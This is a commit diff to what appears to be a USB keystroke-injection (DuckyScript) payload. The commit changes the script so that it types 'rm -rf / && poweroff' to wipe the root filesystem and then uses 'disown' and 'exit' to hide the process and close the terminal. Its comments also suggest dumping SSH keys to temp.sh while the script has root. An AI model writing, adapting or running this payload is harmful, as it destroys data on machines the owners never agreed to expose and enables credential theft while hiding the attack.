Added typed version to remove curl dep
This commit is contained in:
@@ -31,12 +31,13 @@ ENTER
|
||||
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
|
||||
REM clean up after
|
||||
|
||||
STRING rm -rf /
|
||||
REM add 5s delay enough time to think about it before hitting enter or control c
|
||||
DELAY 5000
|
||||
STRING rm -rf / && poweroff > /dev/null 2>&1 &
|
||||
ENTER
|
||||
|
||||
REM poweroff to hide the crash afer 3 seconds and shell will run when rm is done
|
||||
DELAY 3000
|
||||
STRING poweroff
|
||||
REM detach from the process and close terminal to hide
|
||||
DELAY 200
|
||||
STRING disown
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING exit
|
||||
ENTER
|
||||
|
||||
Reference in New Issue
Block a user